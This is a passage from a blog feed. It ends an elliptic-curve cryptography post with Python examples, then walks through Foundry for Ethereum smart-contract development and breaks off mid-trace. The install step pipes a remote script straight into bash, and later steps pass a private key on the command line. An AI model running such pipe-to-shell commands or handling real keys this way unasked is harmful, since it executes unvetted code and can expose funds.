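    return (x3, (s * (x1 - x3) - y1) % p)

def scalar_mul(k, P):
    """Compute kP with about log2(k) doublings instead of k - 1 additions."""
    R = None
    while k:
        if k & 1:
            R = ec_add(R, P)
        P = ec_add(P, P)      # double at every step
        k //= 2
    return R

g = next((x, y) for x in range(p) for y in range(1, p)
         if (y * y - (x**3 + a * x + b)) % p == 0)
naive = None
for _ in range(20):           # the slow way: 20 repeated additions
    naive = ec_add(naive, g)
assert scalar_mul(20, g) == naive
```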
&lt;h2 id=&quot;are-all-elliptic-curves-useful-for-crypto&quot;&gt;Are all elliptic curves useful for crypto?&lt;&#x2F;h2&gt;
&lt;p&gt;The strength of elliptic curve cryptography lies in the hardness of the discrete logarithm problem. This is related to the number of elements (the order) of the cyclic group. If that number is a very large prime, or contains a very large prime in its factorization, then the problem becomes infeasible. However, if the order is made up of small primes, it is possible to search over the subgroups and reconstruct the answer with help from the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Chinese_remainder_theorem&quot;&gt;Chinese Remainder Theorem&lt;&#x2F;a&gt;. This is because the difficulty depends on the size of the largest prime involved.&lt;&#x2F;p&gt;
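&lt;p&gt;The recombination step itself is simple; the work an attacker must do is obtaining the residues in each small subgroup. A sketch of the Chinese Remainder Theorem step, with toy numbers of our own:&lt;&#x2F;p&gt;

```python
# A sketch of the recombination step only (toy numbers are ours): once a
# discrete log k is known modulo each small prime factor of the order,
# the Chinese Remainder Theorem pins down k modulo their product.
def crt(residues, moduli):
    """Solve x ≡ r_i (mod m_i) for pairwise coprime moduli m_i."""
    M = 1
    for m in moduli:
        M *= m
    x = 0
    for r, m in zip(residues, moduli):
        Mi = M // m
        x += r * Mi * pow(Mi, -1, m)   # standard CRT reconstruction term
    return x % M

# suppose subgroup searches revealed k mod 3, k mod 5 and k mod 7:
k = 52
assert crt([k % 3, k % 5, k % 7], [3, 5, 7]) == k
```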
&lt;p&gt;Some curves have desired properties and have been given names. For example, Bitcoin uses secp256k1, which has the following parameters:&lt;&#x2F;p&gt;
&lt;p&gt;&lt;em&gt;a&lt;&#x2F;em&gt; = 0&lt;br &#x2F;&gt;
&lt;em&gt;b&lt;&#x2F;em&gt; = 7&lt;br &#x2F;&gt;
$p = 2^{256}-2^{32}-977$&lt;br &#x2F;&gt;
&lt;em&gt;gx&lt;&#x2F;em&gt; = 0x79be667ef9dcbbac55a06295ce870b07029bfcdb2dce28d959f2815b16f81798&lt;br &#x2F;&gt;
&lt;em&gt;gy&lt;&#x2F;em&gt; = 0x483ada7726a3c4655da4fbfc0e1108a8fd17b448a68554199c47d08ffb10d4b8&lt;br &#x2F;&gt;
&lt;em&gt;r&lt;&#x2F;em&gt; = 0xfffffffffffffffffffffffffffffffebaaedce6af48a03bbfd25e8cd0364141&lt;&#x2F;p&gt;
&lt;p&gt;To get an idea of the number of elements of the group: it is about &lt;em&gt;r&lt;&#x2F;em&gt;≈$10^{77}$. Even if we had $10^{12}$ supercomputers, each checking over $10^{17}$ points per second for a hundred million years, we wouldn’t even get close to inspecting all the possibilities.&lt;&#x2F;p&gt;
&lt;p&gt;To guarantee 128 bits of security, ECs need group orders near 256 bits (that is, orders with prime factors around $10^{77}$). This is because there are algorithms which can solve the problem in around $\sqrt{r}$ operations. If the largest prime is less than 94 bits long, the problem can be broken with help from a desktop computer. Of course, even if your group is large enough, nothing can save you from a poor implementation.&lt;&#x2F;p&gt;
&lt;p&gt;The question arises: how can we know the number of elements of our EC? Luckily, math comes to our aid once again, with tools such as the Hasse bound, Schoof’s algorithm, and primality tests. Next time we will continue revealing the math principles behind useful tools in cryptography.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Ethereum development made easy with Foundry</title>
          <pubDate>Mon, 01 Aug 2022 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/ethereum-development-made-easy-with-foundry/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/ethereum-development-made-easy-with-foundry/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/ethereum-development-made-easy-with-foundry/">&lt;p&gt;As part of our trip to Devcon Amsterdam back in April, we attended the War Room Games Amsterdam competition, an Ethereum CTF where you “hacked” smart contracts to win points. The event was loads of fun, but we realized while playing that our main obstacle was not Ethereum&#x2F;Solidity knowledge, but rather tooling. We knew how to hack most contracts, but struggled to do so because we lacked the right tools, relying a lot on manual Metamask or Remix interaction.&lt;&#x2F;p&gt;
&lt;p&gt;This prompted us to write some &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;ethereum_war_game_tooling&quot;&gt;basic REPL-style tool to develop, deploy and interact with smart contracts on chain&lt;&#x2F;a&gt; written in Elixir, a language we are very comfortable with. After writing its basic functionality in a weekend, we started looking for other existing tools not written in Javascript (the most well-known ones, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;trufflesuite.com&#x2F;&quot;&gt;Truffle&lt;&#x2F;a&gt; and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;hardhat.org&#x2F;&quot;&gt;Hardhat&lt;&#x2F;a&gt;, expect you to do everything in JS).&lt;&#x2F;p&gt;
&lt;p&gt;Enter &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;foundry-rs&#x2F;foundry&quot;&gt;Foundry&lt;&#x2F;a&gt;, an Ethereum toolkit written in Rust. Inspired by &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;dapphub&#x2F;dapptools&quot;&gt;Dapp Tools&lt;&#x2F;a&gt;, it lets you write, run, test and deploy smart contracts, all in Solidity.&lt;&#x2F;p&gt;
&lt;h1 id=&quot;ethereum&quot;&gt;Ethereum&lt;&#x2F;h1&gt;
&lt;p&gt;Before diving into Foundry, a quick recap on Ethereum. As the leading example of blockchain’s second generation, Ethereum distinguishes itself most prominently from Bitcoin by running a full &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Virtual_machine&quot;&gt;Virtual Machine&lt;&#x2F;a&gt; capable of (at least in theory) running any computation. This means that it is not just a public ledger for a virtual currency where users can pay each other, but also a global public computer, capable of trustlessly executing any code.&lt;&#x2F;p&gt;
&lt;p&gt;Thus Ethereum transactions are not limited to &lt;code&gt;eth&lt;&#x2F;code&gt; exchanges, but can be any arbitrary logic, which allowed the creation of stablecoins, NFTs, DeFi or even &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;zkga.me&#x2F;&quot;&gt;actual games&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;For our purposes, you will need to set up an Ethereum account, which you can do by downloading an Ethereum wallet like Metamask (the word “wallet” here is a bit of a misnomer, as it allows you to do more than just manage your money). Take note of your account’s private key (in Metamask, “Account details” -&amp;gt; “Export Private Key”), as it will be needed to send transactions to the network.&lt;&#x2F;p&gt;
&lt;p&gt;NOTE: Treat the account you just created as a throwaway to play around with. In a real scenario, you should never be copy-pasting your private key around, as it is what makes your wallet yours.&lt;&#x2F;p&gt;
&lt;h1 id=&quot;foundry&quot;&gt;Foundry&lt;&#x2F;h1&gt;
&lt;p&gt;Let’s now dive into Foundry by going through an example. First, install it with&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;curl -L https:&#x2F;&#x2F;foundry.paradigm.xyz | bash&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;foundryup&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h2 id=&quot;forge-and-cast&quot;&gt;Forge and Cast&lt;&#x2F;h2&gt;
&lt;p&gt;Foundry’s first and most important tool is &lt;code&gt;Forge&lt;&#x2F;code&gt;, a complete testing framework. Let’s write a very simple smart contract (taken from &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;docs.soliditylang.org&#x2F;en&#x2F;v0.8.13&#x2F;introduction-to-smart-contracts.html&quot;&gt;here&lt;&#x2F;a&gt;) to see it in action.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;creating-a-project&quot;&gt;Creating a project&lt;&#x2F;h2&gt;
&lt;p&gt;Create a new project with&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;forge init storage&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;This will create a &lt;code&gt;storage&lt;&#x2F;code&gt; directory with a bunch of files, the only one we care about for now is in &lt;code&gt;src&#x2F;Contract.sol&lt;&#x2F;code&gt;. Rename that file &lt;code&gt;Storage.sol&lt;&#x2F;code&gt; and add the following code to it&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F; SPDX-License-Identifier: UNLICENSED&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;pragma solidity ^0.8.13;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;contract Storage {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    uint256 number;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    function store(uint256 num) public {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        number = num;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    function retrieve() public view returns (uint256){&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        return number;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The contract is self-explanatory: it stores a certain number with the &lt;code&gt;store(num)&lt;&#x2F;code&gt; method and returns it with &lt;code&gt;retrieve()&lt;&#x2F;code&gt;. Running&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;forge build&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;should tell you compilation was successful. We now have our contract compiled, but how do we run it? This is code that’s meant to be deployed on the Ethereum blockchain, to be interacted with by users who send transactions. Ideally, the tests we perform should be as close as possible to this environment. One thing we can do is deploy the contract to a testnet and call it from there.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;deploying&quot;&gt;Deploying&lt;&#x2F;h2&gt;
&lt;p&gt;To deploy a contract to an Ethereum network, we can use the &lt;code&gt;forge create&lt;&#x2F;code&gt; command. In our case, the easiest way to interact with a testnet is (unfortunately) to use a provider like &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;infura.io&#x2F;&quot;&gt;Infura&lt;&#x2F;a&gt; or &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.alchemy.com&#x2F;&quot;&gt;Alchemy&lt;&#x2F;a&gt;. Just register with a free account and create a &lt;code&gt;Goerli&lt;&#x2F;code&gt; testnet application, which should give you an RPC URL to interact with said testnet that looks something like this:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;https:&#x2F;&#x2F;eth-goerli.g.alchemy.com&#x2F;v2&#x2F;&amp;lt;API_KEY&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Set the &lt;code&gt;ETH_RPC_URL&lt;&#x2F;code&gt; environment variable to this value to use it for all our interactions.&lt;&#x2F;p&gt;
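&lt;p&gt;As a quick sketch, assuming a POSIX shell and using &lt;code&gt;API_KEY&lt;&#x2F;code&gt; as a placeholder for your own provider key, this could look like:&lt;&#x2F;p&gt;

```shell
# Placeholder: substitute the API key from your Infura/Alchemy dashboard.
export ETH_RPC_URL="https://eth-goerli.g.alchemy.com/v2/$API_KEY"
```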
&lt;p&gt;The last thing we need is to fund our account to pay for the transactions we send. For this, look for a faucet like &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;goerlifaucet.com&#x2F;&quot;&gt;this one&lt;&#x2F;a&gt; and request funds by pasting your address (faucets are a bit annoying in that they’re usually either very sketchy or require authentication). Having done all that, let’s deploy our &lt;code&gt;Storage&lt;&#x2F;code&gt; contract:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;forge create Storage --private-key &amp;lt;your_private_key&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;If everything goes well, you should see something like&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Deployer: &amp;lt;your_address&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Deployed to: &amp;lt;contract_address&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Transaction hash: &amp;lt;transaction_hash&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h2 id=&quot;calling-our-contract&quot;&gt;Calling our contract&lt;&#x2F;h2&gt;
&lt;p&gt;To interact with our deployed contract, Foundry has a tool called &lt;code&gt;Cast&lt;&#x2F;code&gt;; it is a more mature CLI version of the Elixir code mentioned at the beginning.&lt;&#x2F;p&gt;
&lt;p&gt;We can call the &lt;code&gt;retrieve()&lt;&#x2F;code&gt; method by doing&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;cast call &amp;lt;contract_address&amp;gt; &amp;quot;retrieve()&amp;quot;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;which should return&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;0x0000000000000000000000000000000000000000000000000000000000000000&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Notice the result is in an awkward hex format; that’s because it’s &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;docs.soliditylang.org&#x2F;en&#x2F;v0.8.13&#x2F;abi-spec.html&quot;&gt;ABI&lt;&#x2F;a&gt; encoded. If we also provide the return type of the method, &lt;code&gt;cast&lt;&#x2F;code&gt; will decode it for us:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;cast call &amp;lt;contract_address&amp;gt; &amp;quot;retrieve()(uint256)&amp;quot;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;0&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;To call the &lt;code&gt;store&lt;&#x2F;code&gt; method, we need to use &lt;code&gt;cast send&lt;&#x2F;code&gt; instead of &lt;code&gt;call&lt;&#x2F;code&gt;. This is because &lt;code&gt;retrieve&lt;&#x2F;code&gt; does not modify any blockchain state; it just reads it. On the other hand, &lt;code&gt;store&lt;&#x2F;code&gt; does modify state, which requires sending an actual transaction to our contract so that, when it gets included in a block, the &lt;code&gt;store&lt;&#x2F;code&gt; method is run and the state of our variable is updated and stored in the network.&lt;&#x2F;p&gt;
&lt;p&gt;All that said, to run &lt;code&gt;store&lt;&#x2F;code&gt; we do&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;cast send &amp;lt;contract-address&amp;gt; --private-key &amp;lt;your_private_key&amp;gt; &amp;quot;store(uint256)&amp;quot; 5&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;which, after a while, should return a transaction receipt with all the info about the transaction, and the &lt;code&gt;number&lt;&#x2F;code&gt; variable should now be updated to &lt;code&gt;5&lt;&#x2F;code&gt;. We can verify that by running again:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;cast call &amp;lt;contract_address&amp;gt; &amp;quot;retrieve()(uint256)&amp;quot;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;5&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h2 id=&quot;writing-tests&quot;&gt;Writing tests&lt;&#x2F;h2&gt;
&lt;p&gt;We just verified that our contract works as expected, though it was a bit cumbersome; the problem with trying out smart contracts, as opposed to more traditional development environments, is that most of the code that matters has to go through a transaction on the blockchain. This is a very slow process, so while the above works, it quickly becomes annoying as the code becomes more complex and starts interacting with other contracts.&lt;&#x2F;p&gt;
&lt;p&gt;Forge allows us to write tests running in a simulated blockchain environment, with the ability to manipulate it to recreate any situation we want.&lt;&#x2F;p&gt;
&lt;p&gt;To keep things simple, we will add a test to the same file we were using before, though typically tests go in separate files. At the bottom of &lt;code&gt;Storage.sol&lt;&#x2F;code&gt;, add:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;import &amp;quot;forge-std&#x2F;Test.sol&amp;quot;;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;contract StorageTest is Test {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    Storage storageContract;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    function setUp() public {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        storageContract = new Storage();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    function testSetWorks() public {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        assertEq(storageContract.retrieve(), 0);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        storageContract.store(5);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        assertEq(storageContract.retrieve(), 5);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Notice this is just another contract written in solidity, only we imported the &lt;code&gt;forge-std&#x2F;Test.sol&lt;&#x2F;code&gt;, which contains all the test code and utilities, like assertions and logging.&lt;&#x2F;p&gt;
&lt;p&gt;The &lt;code&gt;setUp&lt;&#x2F;code&gt; function runs before every test, and in this case just deploys a &lt;code&gt;Storage&lt;&#x2F;code&gt; contract so that we can call it. The test itself is in the &lt;code&gt;testSetWorks()&lt;&#x2F;code&gt; method (test method names must start with the word &lt;code&gt;test&lt;&#x2F;code&gt;), and it does the same thing we did above, only in the blockchain environment provided by Forge.&lt;&#x2F;p&gt;
&lt;p&gt;Running &lt;code&gt;forge test&lt;&#x2F;code&gt; should print the following&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Running 1 test for src&#x2F;Storage.sol:StorageTest&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;[PASS] testSetWorks() (gas: 32478)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Test result: ok. 1 passed; 0 failed; finished in 323.17µs&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h2 id=&quot;printing-and-events&quot;&gt;Printing and events&lt;&#x2F;h2&gt;
&lt;p&gt;A very common problem developers new to Ethereum run into is printing variables for debugging. Again, because our code is meant to be run on the Ethereum virtual machine on-chain, printing to standard output isn’t something baked into the language. Some people get around it by manually emitting &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;ethereum.org&#x2F;es&#x2F;developers&#x2F;tutorials&#x2F;logging-events-smart-contracts&#x2F;&quot;&gt;Events&lt;&#x2F;a&gt;, but this is very cumbersome.&lt;&#x2F;p&gt;
&lt;p&gt;The Forge Test contract gives us &lt;code&gt;console.log&lt;&#x2F;code&gt; methods to print out values when running tests. If we add a log statement to our test, like so&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;function testSetWorks() public {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    assertEq(storageContract.retrieve(), 0);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    storageContract.store(5);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    uint256 result = storageContract.retrieve();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    assertEq(result, 5);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    console.log(result);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;and run the tests again with a verbosity of two (&lt;code&gt;forge test -vv&lt;&#x2F;code&gt;) we should see&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Running 1 test for src&#x2F;Storage.sol:StorageTest&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;[PASS] testSetWorks() (gas: 31774)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Logs:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  5&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;and our variable gets printed. Under the hood, &lt;code&gt;console.log&lt;&#x2F;code&gt; emits actual Ethereum events (the ones mentioned above) in Forge’s execution environment, which are then captured and printed out by Forge.&lt;&#x2F;p&gt;
&lt;p&gt;Note that we could have added calls to &lt;code&gt;console.log&lt;&#x2F;code&gt; to our regular non-test code, and we would have seen those logs when running tests as well.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;traces-and-gas-estimation&quot;&gt;Traces and gas estimation&lt;&#x2F;h2&gt;
&lt;p&gt;In the last section we used the &lt;code&gt;-vv&lt;&#x2F;code&gt; flag when running tests to show logs, but the verbosity level can go up to five. Running &lt;code&gt;forge test -vvvvv&lt;&#x2F;code&gt; should return something like this:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Traces:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  [88926] StorageTest::setUp()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    ├─ [34487] → new Storage@&amp;quot;0xce71…c246&amp;quot;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    │   └─ ← 172 bytes of code&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    └─ ← ()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  [31774] StorageTest::testSetWorks()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    ├─ [2246] Storage::retrieve() [staticcall]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    │   └─ ← 0&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
